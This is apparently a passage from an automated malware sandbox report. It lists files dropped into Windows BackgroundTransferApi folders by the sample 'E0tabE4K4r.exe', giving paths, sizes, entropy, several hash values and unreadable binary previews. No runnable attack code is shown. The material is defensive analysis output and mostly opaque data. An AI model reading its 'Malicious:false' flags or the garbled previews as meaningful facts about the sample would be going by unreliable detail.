                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\2bada827-88bb-42f0-8a5b-fb80a33e3177.e6bca520-fc43-4d18-ad87-ab163dc56734.down_meta

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1426
                                                                                                                                                  Entropy (8bit):7.863167269999615
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:2q+Ubowl3jBomXH+StwTwgOJ/tXa8LgxRBA7bcthYX0sRVHVht+4hnN2bD:LBbowlloi3twTDAXa8WBic7KtdVhk1D
                                                                                                                                                  MD5:A3E19FC58AC38471DB1D025A41B579D2
                                                                                                                                                  SHA1:4C1A73A23068F557863DC3BAD782EE424D7D72FB
                                                                                                                                                  SHA-256:27C9DC26F650E0E9995C2C2F7EF879C98F67A631609B545290F12DB05FC90258
                                                                                                                                                  SHA-512:D6AAE795F63AB7C496BD6DA9AABF1D29398C345390E705CC17723A5E18A2F989DF6762B10962AB892D6CE2E5443B09CDEE235F467CF14D1B6F443BCFF5F03029
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:h.t.t._?.x.4.......]Y.d...._........!...0..1./G.....6vTy...~.:...-.>..' .L|....XX.@.,..t6.Q...8....".3!S9...%.....GOdQ..=..$...[.Qr"W.gl..U..f6&....k.Tz9.u.K...*.......9...r...H........./...........]f.........!.........@.=....u...v.hc.........s%...qcq.\7..r...o.......z.,I4k....t8.R..!..?.:z.d/G$q.wd..%^..T..p...ei.a:.GO.`._..l.....'..o.4.n.....Rfl....7.Vg8.[.5........6.}.N..1.\0..<D.....o.2.U.C..ngoB.....|..v..5....1G.-.J....5. 4.,".E}.|$....z.....~.4 j.4....:.....dD.c6...2.5$.P,..MN.3. &n.!....{T|.@..!.3.I. ...E.m......|F}`.b.f...M.J*TmLS..}U,...BC....5.V.B%(3.t....e...i...2H..=&....0.W#...;..(A.....@0...B..r..\..y.o..Q.?.D.$..........KR.2.....sUY...Zh...G_..u.S.......m.7.mq~.0.}S..%......t.|.O....b...l.9[`........oG. ..%.<a..% ..p......4+..e.q.+...[.7.Y.[>..!._..S.....A"m........DXCL.o..?.p....4q..w.j...F....5<.)pq?..,..../.........$..4..ewE..../o.P....w.qZ........ .@n..-.........(.......*.x..$..Uo.N1D...O.z.s.udB..*.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\2bada827-88bb-42f0-8a5b-fb80a33e3177.up_meta_secure

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):964
                                                                                                                                                  Entropy (8bit):7.732644953978462
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:iJ7e+jkMKuFVyDaMODHxU61tvrk2qYuXgLM08IaSa42bD:iJ7e0dVAaMiHxUi9k2qYYRLrD
                                                                                                                                                  MD5:6695F71E9B91CE0814A62253D91BAF68
                                                                                                                                                  SHA1:648592857975BE505A6089F864B137F45A3F632E
                                                                                                                                                  SHA-256:92121C517BA1E61FCEE3C801C65241D693CEFE94BF86C24CC3E0DB00A36E54F9
                                                                                                                                                  SHA-512:0785B193227A7353A00BD21DFE43C4175B59DA842E7F4480541EF609EE292591770A71FD92B7244BDC6FAACD40FE42A21FAFADB3BC43286A722BD2D065A24875
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:............*.do|.p0.1>=.!..~*@`........4$....&...w.Rd.....$..6..5A.t..{..7.r].^..hYe.....S..; .xH.9....4..!.!~>..p.d. .c3.f...G.J....*QzP.z.f.....-.z..&+....N..jT>......N.Nwl.S.B92..a.e....1. ..19X...;.M..,.......6...+/.giw..Z.....D.&...)..!.oi.Cd.ol..t.=.cZU.....L.....G........V....C.W.=(.T%i...3......./.K..S....!.E@.....U...:...+./Y.2......|....S5...F. .l+....m0]C...o.C.3'...e..Z...W.g.....,`..n..6#.~kze....?..:.9=.......1.5s<D..s.KH..."v.<E...D.%..7{P...NK..7qS.x;...p.".."dz.w...mr.x!..3.........S......O..........<.F.G.xq.k.=(.+In.gD......5.@L..8...{_c..N....wK....F- ".J......~6...y....|..S.+.2...S/b.~.DX. .R..e.7.O...sT......i....r...).....(K.<.b}..>.%~.v."..D..e.......pb.C:.g...S.fe..S.p@........GrFE~.C.v.j...M..K..=..Uo.8...TP.&O.;.9...S.2|.BB......]YgL7....k.C.5C..3..2..,.y._........0.5O5..LQKHk...@..1M$..(...K@.e..s..l........AA.?dmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\321fc870-5c12-4a7d-bedb-d96f13f1ab8b.572adfc1-be42-460d-996a-0db9863c72cf.down_meta

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1654
                                                                                                                                                  Entropy (8bit):7.888076458060344
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:fFGczXhrwW/JBxzzhXbcJFrFDmIx3KTKO1BLwanB3f9D:9pzXh3BxzRcJRVmEKTKO1aEN
                                                                                                                                                  MD5:87598E691EC36BCB14FB5FF5121A6A3F
                                                                                                                                                  SHA1:EA1A1BBFBF096373B4DAB1D22F5BEF4CF53F4F0B
                                                                                                                                                  SHA-256:32F84A841CFA08A0F176D5451FA50F186D87E4CFE5F2535F9D69ADD6964CA6AF
                                                                                                                                                  SHA-512:2942967DBDB992C692D0ABD5267FD79F041A486061D6038178E57B65E37F917AD3524388CB580B3A6CCF9F08029AA68EB5D6E3E3BC5713FB89C0A6042B6C3341
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:h.t.tO.....}A........m.mE 'A<=SA.9...8..T..R.$"].x.vK. ..7...>>-...|.......Oa.@Q....eq4..w.....A.d<5r(b.....M....\.~....&n...u#.fU..;....s.N}.....H..\.....f-.^l.no.~.......#..a..k.k.l......e.@,=.U.$34..-............'...........Ev=..P....9q.N<.R...?>......RW)....+........A........T........C...P$.u/Q.x.6....Q...})BHZ..l..4%.k..(."/..=1l>.Q.....`.;.E........)..a.|.....UZ5......-.r>?.3..........i..}..".K......>....... ....+.\..7......\b.|q....{........e..Zu.....&z....v.".To........1...qHM...i_O..),]..=eH..t.%......:h3..$?..6sA.....^...l...B+...xFRp..%J..Q...pR1.|\.F.l..M&._..y.VBo:.....2..).T=..[.....R`dT.qv>...w.0.R..X.]5.....p(.......wj....y.D....X.........?.3.x...j......p..U.$..gU..E.E.Z.{.~....?.?E...Zu_..-..'.S&2.t..PF......n..i.K....r.6q.,..{..._._...6'y"..G...#.<.:....f..CY....f........}]..{........E.>T......[.B.....%......g.@?!(.....Z....8l..dH.L.H$...ku.r...E......&..C!..RG.vY..2)......f.:...:....o.G.u/...p...$"Ls.....i..v<.....!c

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\321fc870-5c12-4a7d-bedb-d96f13f1ab8b.up_meta_secure

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):836
                                                                                                                                                  Entropy (8bit):7.708676025658104
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:fppqHICOIn3Rvhc2LtbaTVIjvRzJqtgpV/kFs3hC6DTVc9PQj0SUdNcii9a:BDCO8BZbt+Motgppy9SxEPE2bD
                                                                                                                                                  MD5:5EDDA6BF0A913FA2A41082BB241BCDD2
                                                                                                                                                  SHA1:7654E3633284892268723E963A7B987CFFD7339B
                                                                                                                                                  SHA-256:FAB39441C050E6C53344213E92E1236D7DF1950B9053ECEE65248AD1272CE080
                                                                                                                                                  SHA-512:8A03B2B5DB40E383B4B08BE138AC1FB1C7F2E23E326BAE6CA751FFEE41DC01080C161CFC422F8942139EB8142ADA8B36F91A807D76530407EF04B8B891248637
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.......#..`c.....?X[a..K..?..v1..ze.@...(1>.........<..{..|J.I.....w.iW..bp..)ku6.C..4[..B....}.........t......Z...."....l......0G....J.F-..eM.~:.........._"..W....;Z..`../6..: ^.....g_&'....I.&.M'......B..a...Q.7....|X..a.<.|.A)jVf.....<..[.ao..... '..}....l.b....-..~.`.....E....;.|..+...E[boo^,.T..|.A..zy..ro.^.|.&.....8......b...T`.6H...b....".Z/....G....}zn.H...s3U.@Z.i.....a}/.....o..&t...C/.RZ..[.(mI.nO.../.|X.@%...)l....O... .B.>g.s....v....b...S.G..Kr.....J..U........{$g..1...6..U.@.......YZ..N.TU.O9R...._.V..,7....2..L;-....ew...UW.RgU...}.y.....^'UZ..?.m.P...&..9*..H...L.+cBG..n....#.e....pK..v..T..2..k......x<.k........9f.I.K...Ma..Z4.Q.ZMd..K.......BE....+..q....*8.1k../. ...U.%./yf...W<G.w....e.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\3d42442a-c97f-41bf-a1df-894dd6f95f47.11e517bb-3bd4-4ad2-b8e6-1030b65734d7.down_meta

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1426
                                                                                                                                                  Entropy (8bit):7.863234683516881
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:y5OhkK1yMP/1f3EPfbvCyAnxDqXfqVyv0WEDTx5NbHiO0Wsfo3qBfwbMnu82bD:jL1bFf3En3oxDqvu9rsfNBYAuPD
                                                                                                                                                  MD5:A9E0F708C24A24D2FF88C8D32B8D191A
                                                                                                                                                  SHA1:0CB734FF58A2E8E21F38E33E17759CD0B4FA1487
                                                                                                                                                  SHA-256:FA677C0DEC78C6D2CCF4606EDF022B7C1DDB0E5DC63D01EE79D39AA8A8B668E9
                                                                                                                                                  SHA-512:02B2D0AF024E890E23D80FBE1DAA1E59481BFFCDD1D7BF489E9D18270C34E1EB0053CE6090D5FD84D38C6E29BAC9331E1BF6BFB4737A8A5C577C2DCE0AC7275A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:h.t.t.T...q..I.m}..R...<.,*.B.e;....$..V..e...t.j<&..YWUR.I......<...V.6...l.].....}.f...AP......Fg.....~fo.<.\.n<..>(.b.OkF]:.............X.....\p}......P;7.V|.]...LK4+_..K....S...zX.PcY.*-.2...Y...g".~.Q..I....4.5.r..b..ck..%...<'...}.y..:{....O...H..x....8....\.1..;..6...mQ...FA.....s..6`p....n...+h+....C...dz.j..m..q.`.'.....'...Q-.T..fsdA.N......./-..Kx9....MEJ....S.z.8..Li.....n......-...*Q...........>7......QW....5..-....+.K..M..s..N...~t.Ys...*@......{u..` ......`.E.!......J....f..T....N&./.....|.8.~(.o..5.n...6XEs..wA...k.... .I]_2...,k...........=r.$.<.C*.P....30D...{../...mU..........r&....b'.g....Y...,...^.;k...>Jv......-.+..|..lv.\.%u.C.- ..u.E.~..t/..<3....L.s .@..T0..n.>........=a...".,n.w9E...UG.....4..bfr.A.hD..u.....`.fk)&.Z.......o.=t.}t.g...z......x..<U..........?.....u....S...IMM....p$...6....(.G$6lO.-.Q}.>a.o...EL?.).Q,...7.O.^R......Y.".AI.t.W.[.....Ag..'+.....R...m.......<.pPT.'..z.HT..le...j.".u.U.p..1..n.o.j.#i

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\3d42442a-c97f-41bf-a1df-894dd6f95f47.up_meta_secure

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):964
                                                                                                                                                  Entropy (8bit):7.7556019308340804
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:51+5L+T147l6qGTEaEtjTuFzgZElowxHBk5KF9Sz2bD:mS1+k1TyRTezgIN2gD
                                                                                                                                                  MD5:83A14DA9CCA663F1BB65BB544C30BD08
                                                                                                                                                  SHA1:0EB7BC9EB8DE460E089C01C07F93D6790ADEA073
                                                                                                                                                  SHA-256:E7F03405C36BF7E2C5973A6C7ED719CB7A0E3B32A29E1D0ECFFF0F2FC94569D9
                                                                                                                                                  SHA-512:F6C6A096225607AD67CB1FA1680EAF6A7CE57C122DC04D3C4B790EEA3D3FCC6B281A1BA586F453FF0E0D624396A5263A03FFE7410E10474A4E5105E74D99B46C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:......?..U.... /4Q......f1..."...S.?.)1..rtA\).........b..1..]I..Fd.RP.8.....usFf..c...G.5...Q.H.m.....SZ.......k.u..% .v.......W...f..j......=8h65N.......7...F.(.b..-.s1p...6.#.P..m....z.K*.k.&<s......v=Pz.h.k7s..x2...o....r.{.K{.V.5....oqt.j...T.?I.+.M.LML.64r..3]+8H...s.C~d.e.n..sL$3..............S.l\.........(.Y)Y....c...1.E..$.k..;<v.'.K.....P..W..,...tC)..........".$.YB1.;zH.w....U]Y..lo..).F]....-..<......J..Z.M.A.1.....Z......'@..^Nl.].3.G..o.....v,.a..G..d...B..(j0.~|$2L../.iW.^|n.J4....&</V....P...._z.K..k..b2.."....}.c.O......X...$s.6b..~..N......4..U..5....V.."x..(.Le5V..8...X{.c...M..V.h.d......L..F.....q.X...t..f.T.{3h.-..W.<.. ..E8W......;.d.9.S.".\=\.C..c.Q........-g.....+.+}....\fz\53X.,..BF=....'..\T.......d..rmX!`4...e5........f.VD.....V|nv....J..!m..].R.k.+.....1...=...|.<...P. .>.@....?.a...,}I .2.....Tt.\..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\456c7920-906c-45ea-b749-672648126456.6bfe7569-b9f7-4d7b-8cbe-4e5079d210b0.down_meta

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1658
                                                                                                                                                  Entropy (8bit):7.8951701016696445
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:T4GsgrX7yeq+L/EfNYK8NnL+HTxljLL+HegtIkVdbD:T4GsIPxGNYHtOTHf+HegtIMl
                                                                                                                                                  MD5:6B5B1D9F0155F002197E9957DD632078
                                                                                                                                                  SHA1:0BC882487C439E9FCC244A8BCBE57790D5BA9CBF
                                                                                                                                                  SHA-256:587146106756909BEBEE89A28E567CC6961D60C482DB73B68DFA750C76ED405D
                                                                                                                                                  SHA-512:12C5F63B6C9502282A1691002BB5720A1DCC14802F77BA859DFD93B43AB20C816E331A74488A6AA9D35E50BBAE2FA78FDFB547878DA2567E2D0934B52B14FB48
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:h.t.t".......*L"..2{......b8<...WX..?.+.o;....V0..$x.e.v..&.Q..$.M....+........+.JQ}..,.......*.N.5.k..........7.B.-.._.};%.)E2Kx...1./..$..wS'r,...j..L5..).......a.y>.1Z..O@.$..:...5O|..d.PX.F.P.lV...V".....X...^C....}.`(.=.j.G5...P.a.T....a.>."i...............i....Uw...%.4.P...Q....t...In...9.qI....0..P................+.w.k.2!.=a......Y;..b.R=..cp.@....J..b.1Fe.......<.`.[....Y....j........7KuAa...iMy..HD d..TX...;7}1J...n.#.G...Y/..x..{.......v}I.F64.@..8e.L...j.X(..s.t.. :.|...K......m.....EW...TO.wL...e..H+....-..~f.]...2....={....!.........T.nsD.\H.M...3.M.g.nhjb.26..J".Y>=%.Y.T...........a...&...E..O..v,.fG......<...;...........~...:=......B.[?.D.L....,.5y.T.....%]......Z.M.z"..{Er.....n.r).uGbg....E.U....].@....#j.....eF7.,c.u.4=..l*.L}..'..x....>o...{.O.f3............cU.WI..a&...%..]9..q.........L..."..#.S.%5.yd;Y....p.]..K.......W..=....|..I%?....T*3.......5..@.....u..,n<...1.|..]....B.....-.......U-..3......h?.R.R..L.q...].q..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\456c7920-906c-45ea-b749-672648126456.up_meta_secure

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):836
                                                                                                                                                  Entropy (8bit):7.743184647116772
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:yiE8L9BirZ6JChESEQhkmEkfRPKkYtM6fPi5w7fjK0HkQrq4d93YvjMDtC2FHSSw:M8L9IZSS5kDkfqiyb2+kX4DRFh2bD
                                                                                                                                                  MD5:0781EEB5CBB5BB424936496855860C88
                                                                                                                                                  SHA1:64E847F42D2B7ABCCD170F3BD770A993BD81DCBB
                                                                                                                                                  SHA-256:533A81A6DBE2197353E194E706A0A1BF1EB0F77CF0869052D2F00F107EC3F00E
                                                                                                                                                  SHA-512:7F04ABE1D21606391160330AD0280CA93AEC9530FEE193419C55659B157D0493A4FD0272BCA615801610DF57B7B3421A4A6F4E04AF09216CC1B7C5D549F8B224
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..........)..9........K..}.7.x.J.....B-..O...xqL....UY.N.#_.K..+...E..N.b.y...x...\.C$.r.Q...14.q...S....W..>S.V.F....S#>...._,.c..t.....q..T. LPc.p.M....q.>.....M.)..Z..bZ...07.........K.s....=./....Esk..E..v.@PK..;...P.3kh^GR..d.?...eo`..1r....XL.0..I...y.T%C.>it.-s.e.?H../.O%.a.P...d..e....s...T.7.s.......E...C. zR.=g..L..."..Vq1j...^..8..dNk-.2.Z..w.8.j:.VHbA...x...Wt1I..u.2.6.Ws..N.......PaG_.I..`...`..(ej._....>.\.;>[.G..B.j.\.B......z(S`.b9...z.. ...obdw...qI....Bb{R]..UO.........}...}$,9 ..&/..u.3q.._S...n...K..a.....4.]x.S.#.F..o...Ds..Q.H.......q..O....).....+.c..s..].i...k(t:L.....5X.I^..w\.C..+{.l....J.....R[..+K)....A+r..!........N......[....K;{UU.s......K.QR....s[T[A.j..B....+.".. ......p.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\493a8374-e7e6-4eef-9246-468d7371fd67.0eaab739-09f6-40e1-82cc-53c7e6636c41.down_meta

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1426
                                                                                                                                                  Entropy (8bit):7.856483591992128
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:IEOYaRUZN/unLxEIoIkAq0I+sxo6/5/GVYtaf5Oo+Crc2bD:9OYamZN/Q+3AsxO18o+wvD
                                                                                                                                                  MD5:4756B29F7A7FD46BDD60D12BC9922E1F
                                                                                                                                                  SHA1:920AFC4ED6AEF1B7A9D8F20A63D9E3167BCFABD8
                                                                                                                                                  SHA-256:04C5DBF78E047DC3ED79F4B0D16A8A2D86A0EE320D557CCFECEEBFD3F397A287
                                                                                                                                                  SHA-512:321F4B05916149EC8A67D03BD77DE2775B04F2BC525D983D9A39E89D8E5DF7B46E899A7895BE5B63D1C472CA6FF510CE498A941D84653F088FC3E490F8DD1D4C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:h.t.t.b..N..iJ.....E...._....Y0'......H74..TQ!.qn...@......[.....D@...2=j}1j.._.....~.'&J.ls...7.B"..-...>q...f./......L..C...r.&nW...g..i.)q....6.#UH_..N.9k:a9.2T...q.........a.@..Q.y..y.#.....D#..}Y..*.....tm..N.Z Yu...]..q...\...d.T...A.M.?.......N...Mu...Z....o#..<a..... .LP.r....b{a..6!S...N.>..G{,..s.....x#PH."w...z.4...S.6..q.l...w......^.....j.}...^.KIN*.#.Y."..IwzshO..f,3..Od?z...A..N.......OQpr..'.&..6...7/.mf...UU.W...w...f...nka......K)(,WM1n..}VU.p....7HY...UxJ...$....H.+.... ...{*g.g.U\.7..]........&4~...[W...c/....(V]..d.+P..rH..\..m.LRY...\..+.h..2........N.B.!,....,.am..L..2..Uu.......#.f0...u...;.GPFj..W..}.2.K..T..B...T...I....x....e.PH..U7.Ze..2.NF.p.a.7.6.`.2P...@w.....U.....X.jL%.kJ..eT.k.10.S3.....\9.%.bp.0-..-k.i.!f.;.....g0...._.Z....).......F..j.q.5,.*......J..t-!...vt.G.V..........H.&#.....\.". .=..9X.x.j..B..Kf.:.....6do...V.!. .c..}M.4.$.....M...D.....I.Z...sP......\....*.-..;.`...jq.w.z...g._4..&N....wd..2....a.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\493a8374-e7e6-4eef-9246-468d7371fd67.up_meta_secure

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):964
                                                                                                                                                  Entropy (8bit):7.813075178134474
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:ciZUWd/rj3pOtUVryfY1wIu8bDLXeVz5jByK8rmPo2bD:ciZUO3nBywjc59rD
                                                                                                                                                  MD5:C30C2FFFD70B6C244A047E1E9071F25D
                                                                                                                                                  SHA1:44FB06B28D84A33939B75D2FF0B4CEE406ED2C91
                                                                                                                                                  SHA-256:A747F4B6AF44D246E0F18F2EBB44857755F25CA5E127070D2C89DED7BCDD2545
                                                                                                                                                  SHA-512:85B014CCB0F58F45C6663E8B2BAC3B9DF0F029A97F00277C72B9F4F88F0F29E3E2F21B18E438E17C21D10F3F1186C247B874DBE8D1FF65DDC7A383469439A2E4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.....g!I...{Q..K.....IH..<.[.!..`.g.+`&:a..-..F.WF+.5B...P.N.u...,M. ../..~.....L.'.F. .."6.H..P.........4....V[=....F......M=U...u.........`.(.....lz,D.X^.91....L5........b."}....!\.T.....e........X.o....7.I%..D..D?..H...%}.$.6x.....4.....F..2.;..]..S.U.)<P.R..S.Ca..^Q&.-..`..(.[.z$y/...{.....b..LO....5.{..=.g..;.C.t..l.Y<p.[...?.QL..=......E&.q/....X.X........vo.=.2...O._.:.....{e.....^.8z.c.?..;..(.. J.....R...j..A..$......9.W.}}=.......s.Wa..3.d.F,.........a#..*..TS...C.uW...29...|&AIv.4.`.8...`3..4....iY....)..g...`.e).....Tw..#...+vA........l....q..0.B.A.......|...x."....B_..[....g49.t.$..`..qb.Q...Kh..18.4....Z...z.y..3..1.~T.|...7...N.4..g.ML.X....-........ri.b...%.gbA%.-l...X:._....;m.l...a.n.....c....K\..&Y...8N.}..t..O....w`...j.N.|S.R....s.iL....n0...@..qu..\.5..m...F....3.....Z.n4....Q......8.....K H...a.........mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\802d495d-b395-4016-9f35-d0b5b0d5a775.91c2dd62-ee36-42d8-9eab-71d798866e74.down_meta

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1426
                                                                                                                                                  Entropy (8bit):7.843542045822463
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:mX6e2FMvgIzKwRmKKP/d248+6p/3jMRRkcQMdZ07dU2bD:CIKvdzKw2/sx+i4zE7hD
                                                                                                                                                  MD5:2BF229D4E9025DF1B2F879560F14FBB8
                                                                                                                                                  SHA1:04A5831C09F5E029EDD1B4B3FE88C557BAAD5FDA
                                                                                                                                                  SHA-256:EF3A664775E84893705047609B44B19D510B095DFFB232A436D0C99595DC0A57
                                                                                                                                                  SHA-512:DAD3849F23BCB0239735041CB7D5048BC61ABAEE7C4B331DE28E96A3B371D4014A342D1735386D45DD6C7760706B0993099F95A7663A4A62DC94F7F8DC462D30
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:h.t.t.w|J.~V..J.Th....a%............W......AN.h.mX..}.F........D.P.(.l&..,b.o....../.N..0;e..^u".u".z.,5...0..."1(.....us...6i..E......&.x.".z.k_x.*)-....Oso...!./.c..;X]X..N.E..........p...Tx...L..)o.s.......y....u\.%..^...M.........L..f...'.btMZ...w!.\&........%..+.zDm<.P._.=.`PG.:t.A".d....'...A...n....mf.Hj....qh*(.B...g.Gu.?...F. ....Y...K..X.[_...dj.i&.......$rz.y.AU...i.bR....R.8.7.Z...[....z.*....O$D....Z%id..*.VO.k....P.mM...8G..e......~).-..3..sF,.`.......0.../.2.[+..p...mvCe.]8...=."..@?..!<.M/........k..V. ..............'1.5.:.i..H..dw.?6J.D..@...4w..q.s$J.....".A.N.W.Lf...T....zx...a.H..o:=..|.C..&....5..4......._..y._Ih....|.5.-.T.^C.%ef...X5..\X.'j..s...ISn.E7.G.HW.......1.{....t..wY...^..R....V6...H...l......*H..A.nA...d..0..'.......y.r6s..#..#.\`........y.Wo.@...2GX.b/.h|.%8.....H.M.c.F/....C.>p.....JJ?OF....~.E4c|....OJ"../Y.<...2..#o.7.{.....Z..w..W,./.."....Z..w..6#H...=..u....f.F.....d*..K.......i/3..}..=.&2uI.~...~.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\802d495d-b395-4016-9f35-d0b5b0d5a775.up_meta_secure

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):964
                                                                                                                                                  Entropy (8bit):7.803124816739123
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:xv5koK0C0UFXLXO6K+C7vxaSyL7AWIVInjcMMGVIZyJ2bD:XXK01UFXLXO6K+Cbxa5L9IMMGVIZyiD
                                                                                                                                                  MD5:986A0D16E51E349C8B9C5803F650785E
                                                                                                                                                  SHA1:3FDB388FB0397A6FBB3A7580A941CAD12ED69781
                                                                                                                                                  SHA-256:50B9C9D4B1B23C433123587810A3EE729103494750744BC6C85C1CEB0C30994E
                                                                                                                                                  SHA-512:C0B6741D20968015B871CD1C49D47A80FBA048B00CD5A6432ED2D866CDF69974CE7EBF343C3B38A240FD32337F68C3C865113B11394F513C098110A1BAC8CD01
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:........N...s.l9.<=[..N._....z..U...x_m.l=.P3.\m......D..n....J .+e...#.N$......+..^.....\E....}.]..>..+PlD{.ot......C2..c....wY..>."..h|. .u*..m*x..6h..Lt.}l.$.U....*..~....0.O.)...IaM.s\.8N...V..z.s6...x3.w.f=./..:b...Y..:_q...-.Y$...t.[...nkZ.x.i/.\3.Ie....iH~.......8Q..P..+d(.p....`&..\.u.x}=(.N:...(.)....d<..d&......_.s..I-....fx:.\..}.w.7]..u\....4.0..0Q..........?.nuK.\.`cO4.o.b .....r?'{....i.H..IK..).g...#..5.....0..pM.l.|./.z|...)h.S....e7.ws.'.&.4.VU...m......k....eC.=...3...\...~V..crw...F...\..;..z NKP..(|......;=...m..z...@I.........}..E.U...6...C....`............d.....o...*N.'V...........m..?......C.....#~...Q)YM....y..[....=._.P...5...Cq....M........!.|..h.....F%.(u..V..:.[*.`H.....b.p....k.U.I....M...9;G.....@. .....L.!./.c[.0.SX.H..~...k"-9....@R....9.....JUV..,.....4....W.k..K4g.......T..-Ng.'.sY....z.;mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\82e31516-2550-42c1-a4b9-d4fb0eaaef96.503b6078-0e95-4a45-8ff7-2c0d119ac395.down_meta

